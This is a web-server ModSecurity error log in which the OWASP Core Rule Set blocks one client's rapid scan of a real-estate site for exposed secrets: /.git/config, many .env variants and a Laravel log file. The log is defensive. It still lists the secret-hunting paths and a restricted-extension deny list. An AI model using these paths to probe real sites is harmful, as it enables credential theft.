[Tue May 12 06:57:40.535038 2026] [security2:error] [pid 1820198:tid 1820217] [client 85.121.126.213:49224] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.git/config"] [unique_id "agKzRM1tk6y7yBJLpJpQPQAAAJE"]
[Tue May 12 06:57:40.535207 2026] [security2:error] [pid 1820198:tid 1820217] [client 85.121.126.213:49224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.git/config"] [unique_id "agKzRM1tk6y7yBJLpJpQPQAAAJE"]
[Tue May 12 06:57:40.535416 2026] [security2:error] [pid 1820198:tid 1820217] [client 85.121.126.213:49224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.git/config"] [unique_id "agKzRM1tk6y7yBJLpJpQPQAAAJE"]
[Tue May 12 06:57:40.535885 2026] [security2:error] [pid 1844863:tid 1844878] [client 85.121.126.213:49310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.production"] [unique_id "agKzRPaAnTZtx1_H_wzRsAAAAUk"]
[Tue May 12 06:57:40.536099 2026] [security2:error] [pid 1844863:tid 1844878] [client 85.121.126.213:49310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.production"] [unique_id "agKzRPaAnTZtx1_H_wzRsAAAAUk"]
[Tue May 12 06:57:40.536155 2026] [security2:error] [pid 1808852:tid 1808879] [client 85.121.126.213:49326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.development"] [unique_id "agKzRBfeipD4uoG21FpMRgAAABg"]
[Tue May 12 06:57:40.536233 2026] [security2:error] [pid 1842385:tid 1842393] [client 85.121.126.213:49374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.test"] [unique_id "agKzRBs7kySIUZ3ORnJAFwAAAQM"]
[Tue May 12 06:57:40.536303 2026] [security2:error] [pid 1825179:tid 1825198] [client 85.121.126.213:49302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.example"] [unique_id "agKzRNr1yOh9Tvizezi45AAAAEE"]
[Tue May 12 06:57:40.536310 2026] [security2:error] [pid 1808852:tid 1808879] [client 85.121.126.213:49326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.development"] [unique_id "agKzRBfeipD4uoG21FpMRgAAABg"]
[Tue May 12 06:57:40.536345 2026] [security2:error] [pid 1844863:tid 1844878] [client 85.121.126.213:49310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.production"] [unique_id "agKzRPaAnTZtx1_H_wzRsAAAAUk"]
[Tue May 12 06:57:40.536459 2026] [security2:error] [pid 1842385:tid 1842393] [client 85.121.126.213:49374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.test"] [unique_id "agKzRBs7kySIUZ3ORnJAFwAAAQM"]
[Tue May 12 06:57:40.536463 2026] [security2:error] [pid 1825179:tid 1825198] [client 85.121.126.213:49302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.example"] [unique_id "agKzRNr1yOh9Tvizezi45AAAAEE"]
[Tue May 12 06:57:40.536482 2026] [security2:error] [pid 1820198:tid 1820220] [client 85.121.126.213:49356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.old"] [unique_id "agKzRM1tk6y7yBJLpJpQPwAAAJQ"]
[Tue May 12 06:57:40.536535 2026] [security2:error] [pid 1808852:tid 1808879] [client 85.121.126.213:49326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.development"] [unique_id "agKzRBfeipD4uoG21FpMRgAAABg"]
[Tue May 12 06:57:40.536638 2026] [security2:error] [pid 1820198:tid 1820220] [client 85.121.126.213:49356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.old"] [unique_id "agKzRM1tk6y7yBJLpJpQPwAAAJQ"]
[Tue May 12 06:57:40.536683 2026] [security2:error] [pid 1825179:tid 1825198] [client 85.121.126.213:49302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.example"] [unique_id "agKzRNr1yOh9Tvizezi45AAAAEE"]
[Tue May 12 06:57:40.536769 2026] [security2:error] [pid 1842385:tid 1842393] [client 85.121.126.213:49374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.test"] [unique_id "agKzRBs7kySIUZ3ORnJAFwAAAQM"]
[Tue May 12 06:57:40.536847 2026] [security2:error] [pid 1820198:tid 1820220] [client 85.121.126.213:49356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.old"] [unique_id "agKzRM1tk6y7yBJLpJpQPwAAAJQ"]
[Tue May 12 06:57:40.537373 2026] [security2:error] [pid 1842385:tid 1842403] [client 85.121.126.213:49386] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/admin/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGQAAAQ0"]
[Tue May 12 06:57:40.537418 2026] [security2:error] [pid 1825287:tid 1825330] [client 85.121.126.213:49398] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agKzRAgpmE1yW0glLdhH4gAAANg"]
[Tue May 12 06:57:40.537524 2026] [security2:error] [pid 1842385:tid 1842403] [client 85.121.126.213:49386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/admin/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGQAAAQ0"]
[Tue May 12 06:57:40.537580 2026] [security2:error] [pid 1825287:tid 1825330] [client 85.121.126.213:49398] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agKzRAgpmE1yW0glLdhH4gAAANg"]
[Tue May 12 06:57:40.537653 2026] [security2:error] [pid 1825179:tid 1825204] [client 85.121.126.213:49360] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.staging"] [unique_id "agKzRNr1yOh9Tvizezi45QAAAEY"]
[Tue May 12 06:57:40.537658 2026] [security2:error] [pid 1808852:tid 1808875] [client 85.121.126.213:49380] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/api/.env"] [unique_id "agKzRBfeipD4uoG21FpMRwAAABQ"]
[Tue May 12 06:57:40.537679 2026] [security2:error] [pid 1825287:tid 1825320] [client 85.121.126.213:49344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.bak"] [unique_id "agKzRAgpmE1yW0glLdhH4wAAAM8"]
[Tue May 12 06:57:40.537731 2026] [security2:error] [pid 1842385:tid 1842403] [client 85.121.126.213:49386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/admin/.env"] [unique_id "agKzRBs7kySIUZ3ORnJAGQAAAQ0"]
[Tue May 12 06:57:40.537800 2026] [security2:error] [pid 1825287:tid 1825330] [client 85.121.126.213:49398] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/app/.env"] [unique_id "agKzRAgpmE1yW0glLdhH4gAAANg"]
[Tue May 12 06:57:40.537811 2026] [security2:error] [pid 1825179:tid 1825204] [client 85.121.126.213:49360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.staging"] [unique_id "agKzRNr1yOh9Tvizezi45QAAAEY"]
[Tue May 12 06:57:40.537818 2026] [security2:error] [pid 1808852:tid 1808875] [client 85.121.126.213:49380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/api/.env"] [unique_id "agKzRBfeipD4uoG21FpMRwAAABQ"]
[Tue May 12 06:57:40.537846 2026] [security2:error] [pid 1825287:tid 1825320] [client 85.121.126.213:49344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.bak"] [unique_id "agKzRAgpmE1yW0glLdhH4wAAAM8"]
[Tue May 12 06:57:40.538048 2026] [security2:error] [pid 1808852:tid 1808875] [client 85.121.126.213:49380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/api/.env"] [unique_id "agKzRBfeipD4uoG21FpMRwAAABQ"]
[Tue May 12 06:57:40.538047 2026] [security2:error] [pid 1825179:tid 1825204] [client 85.121.126.213:49360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.staging"] [unique_id "agKzRNr1yOh9Tvizezi45QAAAEY"]
[Tue May 12 06:57:40.538072 2026] [security2:error] [pid 1825287:tid 1825320] [client 85.121.126.213:49344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.bak"] [unique_id "agKzRAgpmE1yW0glLdhH4wAAAM8"]
[Tue May 12 06:57:40.538095 2026] [security2:error] [pid 1820198:tid 1820218] [client 85.121.126.213:49392] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/backend/.env"] [unique_id "agKzRM1tk6y7yBJLpJpQQAAAAJI"]
[Tue May 12 06:57:40.538247 2026] [security2:error] [pid 1820198:tid 1820218] [client 85.121.126.213:49392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/backend/.env"] [unique_id "agKzRM1tk6y7yBJLpJpQQAAAAJI"]
[Tue May 12 06:57:40.538442 2026] [security2:error] [pid 1820198:tid 1820218] [client 85.121.126.213:49392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/backend/.env"] [unique_id "agKzRM1tk6y7yBJLpJpQQAAAAJI"]
[Tue May 12 06:57:40.618274 2026] [security2:error] [pid 1844863:tid 1844876] [client 85.121.126.213:49248] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "sierraimmobilier.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKzRPaAnTZtx1_H_wzRsgAAAUc"]
[Tue May 12 06:57:40.618628 2026] [security2:error] [pid 1844863:tid 1844876] [client 85.121.126.213:49248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKzRPaAnTZtx1_H_wzRsgAAAUc"]
[Tue May 12 06:57:40.618846 2026] [security2:error] [pid 1844863:tid 1844876] [client 85.121.126.213:49248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKzRPaAnTZtx1_H_wzRsgAAAUc"]
